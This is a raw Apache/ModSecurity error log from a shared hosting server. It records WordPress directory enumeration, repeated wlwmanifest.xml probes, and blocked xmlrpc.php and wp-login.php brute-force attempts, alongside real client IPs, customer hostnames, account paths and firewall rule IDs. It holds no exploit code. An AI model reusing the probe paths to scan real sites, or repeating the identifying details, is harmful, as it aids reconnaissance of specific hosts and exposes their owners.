[Tue May 26 17:13:41.576826 2026] [security2:error] [pid 860158:tid 860379] [client 113.188.221.211:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHbYYFlz_JJsUnscK9WgAAAOA"]
[Tue May 26 17:13:41.731079 2026] [autoindex:error] [pid 860158:tid 860322] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:41.921609 2026] [autoindex:error] [pid 860158:tid 860407] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:42.177642 2026] [autoindex:error] [pid 860158:tid 860356] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:42.428428 2026] [cgid:error] [pid 860158:tid 860326] [client 45.86.200.42:0] AH01265: stderr from /home1/sotopzya/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 17:13:42.436016 2026] [security2:error] [pid 860158:tid 860340] [client 203.194.101.7:50009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHboYFlz_JJsUnscK9fwAAALk"]
[Tue May 26 17:13:42.436174 2026] [security2:error] [pid 860158:tid 860340] [client 203.194.101.7:50009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHboYFlz_JJsUnscK9fwAAALk"]
[Tue May 26 17:13:42.764936 2026] [security2:error] [pid 860158:tid 860311] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHboYFlz_JJsUnscK9ggAAAJw"]
[Tue May 26 17:13:42.906614 2026] [autoindex:error] [pid 860158:tid 860324] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:43.474506 2026] [autoindex:error] [pid 860158:tid 860309] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:43.668755 2026] [autoindex:error] [pid 860158:tid 860382] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:44.559411 2026] [security2:error] [pid 860158:tid 860354] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHcIYFlz_JJsUnscK9tgAAAMc"]
[Tue May 26 17:13:45.010996 2026] [autoindex:error] [pid 860158:tid 860370] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:45.156305 2026] [security2:error] [pid 860158:tid 860340] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHcIYFlz_JJsUnscK9vAAAALk"]
[Tue May 26 17:13:45.320299 2026] [autoindex:error] [pid 860158:tid 860308] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/customize/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:45.534302 2026] [autoindex:error] [pid 860158:tid 860369] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:45.762587 2026] [autoindex:error] [pid 860158:tid 860366] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:45.938314 2026] [autoindex:error] [pid 860158:tid 860310] [client 2.58.56.163:61333] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:45.967057 2026] [autoindex:error] [pid 860158:tid 860387] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:46.092575 2026] [autoindex:error] [pid 860158:tid 860403] [client 2.58.56.163:61333] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:46.183514 2026] [autoindex:error] [pid 860158:tid 860291] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:46.236675 2026] [security2:error] [pid 860158:tid 860322] [client 2.58.56.163:61333] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWHcoYFlz_JJsUnscK97QAAAKc"]
[Tue May 26 17:13:46.468738 2026] [security2:error] [pid 860158:tid 860380] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHcoYFlz_JJsUnscK98AAAAOE"]
[Tue May 26 17:13:46.537008 2026] [autoindex:error] [pid 860158:tid 860328] [client 2.58.56.163:63443] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:46.664110 2026] [autoindex:error] [pid 860158:tid 860327] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:46.685364 2026] [security2:error] [pid 860158:tid 860370] [client 2.58.56.163:63443] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWHcoYFlz_JJsUnscK-AQAAANc"]
[Tue May 26 17:13:46.896083 2026] [autoindex:error] [pid 860158:tid 860331] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:46.987585 2026] [security2:error] [pid 860158:tid 860409] [client 2.58.56.163:65523] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWHcoYFlz_JJsUnscK-CQAAAP4"]
[Tue May 26 17:13:47.129380 2026] [security2:error] [pid 860158:tid 860401] [client 103.174.5.177:63986] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHc4YFlz_JJsUnscK-EAAAAPY"]
[Tue May 26 17:13:47.129508 2026] [security2:error] [pid 860158:tid 860401] [client 103.174.5.177:63986] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHc4YFlz_JJsUnscK-EAAAAPY"]
[Tue May 26 17:13:47.152244 2026] [security2:error] [pid 860158:tid 860338] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHc4YFlz_JJsUnscK-DAAAALc"]
[Tue May 26 17:13:47.314982 2026] [security2:error] [pid 860158:tid 860389] [client 2.58.56.163:55424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWHc4YFlz_JJsUnscK-FwAAAOo"]
[Tue May 26 17:13:47.415093 2026] [security2:error] [pid 860158:tid 860307] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHc4YFlz_JJsUnscK-GwAAAJg"]
[Tue May 26 17:13:47.608521 2026] [security2:error] [pid 860158:tid 860321] [client 2.58.56.163:52237] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWHc4YFlz_JJsUnscK-IAAAAKY"]
[Tue May 26 17:13:47.660655 2026] [security2:error] [pid 860158:tid 860301] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHc4YFlz_JJsUnscK-HwAAAJI"]
[Tue May 26 17:13:47.898231 2026] [security2:error] [pid 860158:tid 860362] [client 2.58.56.163:56569] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWHc4YFlz_JJsUnscK-LQAAAM8"]
[Tue May 26 17:13:48.060700 2026] [autoindex:error] [pid 860158:tid 860397] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:48.188659 2026] [security2:error] [pid 860158:tid 860349] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHc4YFlz_JJsUnscK-JgAAAMI"]
[Tue May 26 17:13:48.207033 2026] [security2:error] [pid 860158:tid 860320] [client 2.58.56.163:55335] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWHdIYFlz_JJsUnscK-NgAAAKU"]
[Tue May 26 17:13:48.309983 2026] [security2:error] [pid 860158:tid 860359] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHdIYFlz_JJsUnscK-OQAAAMw"]
[Tue May 26 17:13:48.531119 2026] [security2:error] [pid 860158:tid 860408] [client 2.58.56.163:57696] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWHdIYFlz_JJsUnscK-QwAAAP0"]
[Tue May 26 17:13:48.672300 2026] [security2:error] [pid 860158:tid 860357] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHdIYFlz_JJsUnscK-SQAAAMo"]
[Tue May 26 17:13:48.818651 2026] [security2:error] [pid 860158:tid 860351] [client 2.58.56.163:53441] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWHdIYFlz_JJsUnscK-VgAAAMQ"]
[Tue May 26 17:13:48.942545 2026] [autoindex:error] [pid 860158:tid 860400] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:48.951385 2026] [security2:error] [pid 860158:tid 860314] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHdIYFlz_JJsUnscK-RgAAAJ8"]
[Tue May 26 17:13:49.045716 2026] [security2:error] [pid 860158:tid 860183] [remote 45.32.67.165:55160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWHdIYFlz_JJsUnscK-VwAA9hg"]
[Tue May 26 17:13:49.131152 2026] [security2:error] [pid 860158:tid 860376] [client 2.58.56.163:59603] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWHdYYFlz_JJsUnscK-XAAAAN0"]
[Tue May 26 17:13:49.145003 2026] [autoindex:error] [pid 860158:tid 860336] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:49.438031 2026] [autoindex:error] [pid 860158:tid 860407] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:49.445200 2026] [security2:error] [pid 860158:tid 860404] [client 2.58.56.163:64330] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWHdYYFlz_JJsUnscK-awAAAPk"]
[Tue May 26 17:13:49.752370 2026] [security2:error] [pid 860158:tid 860322] [client 2.58.56.163:62756] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWHdYYFlz_JJsUnscK-cQAAAKc"]
[Tue May 26 17:13:49.921346 2026] [security2:error] [pid 860158:tid 860380] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHdYYFlz_JJsUnscK-dQAAAOE"]
[Tue May 26 17:13:50.379303 2026] [security2:error] [pid 860158:tid 860296] [client 185.191.171.12:13710] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/unapproved=1228805&moderation-hash=77ff0e116a7ed2a90"] [unique_id "ahWHdoYFlz_JJsUnscK-gwAAAI0"]
[Tue May 26 17:13:50.379410 2026] [security2:error] [pid 860158:tid 860296] [client 185.191.171.12:13710] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/unapproved=1228805&moderation-hash=77ff0e116a7ed2a90"] [unique_id "ahWHdoYFlz_JJsUnscK-gwAAAI0"]
[Tue May 26 17:13:50.515119 2026] [security2:error] [pid 860158:tid 860341] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHdoYFlz_JJsUnscK-hgAAALo"]
[Tue May 26 17:13:50.990389 2026] [autoindex:error] [pid 860158:tid 860409] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:51.134285 2026] [security2:error] [pid 860158:tid 860395] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHdoYFlz_JJsUnscK-jgAAAPA"]
[Tue May 26 17:13:51.196202 2026] [autoindex:error] [pid 860158:tid 860336] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:51.523563 2026] [security2:error] [pid 860158:tid 860362] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHd4YFlz_JJsUnscK-qgAAAM8"]
[Tue May 26 17:13:51.800676 2026] [security2:error] [pid 860158:tid 860316] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHd4YFlz_JJsUnscK-sAAAAKE"]
[Tue May 26 17:13:52.096954 2026] [security2:error] [pid 860158:tid 860361] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHeIYFlz_JJsUnscK-vQAAAM4"]
[Tue May 26 17:13:52.442069 2026] [autoindex:error] [pid 860158:tid 860290] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:52.702375 2026] [security2:error] [pid 860158:tid 860327] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHeIYFlz_JJsUnscK-wQAAAKw"]
